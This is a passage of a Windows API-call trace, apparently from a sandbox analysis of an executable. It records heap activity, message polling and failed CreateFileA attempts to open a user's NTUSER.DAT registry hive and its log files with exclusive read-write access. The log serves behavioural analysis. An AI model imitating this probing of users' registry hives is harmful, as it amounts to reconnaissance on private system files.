hHeap=0x8a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.440] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8a0 [0188.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.441] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0188.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0188.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd8a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0188.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.442] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0188.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0188.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0188.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0188.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x29) returned 0x9bf310 [0188.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", cchWideChar=41, lpMultiByteStr=0x9bf310, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpUsedDefaultChar=0x0) returned 41 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.443] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0188.444] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.446] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.446] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.447] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.447] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.447] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.447] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.447] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.448] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.449] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.449] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.450] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.450] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.450] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.450] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.450] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.450] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.450] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.450] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.450] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 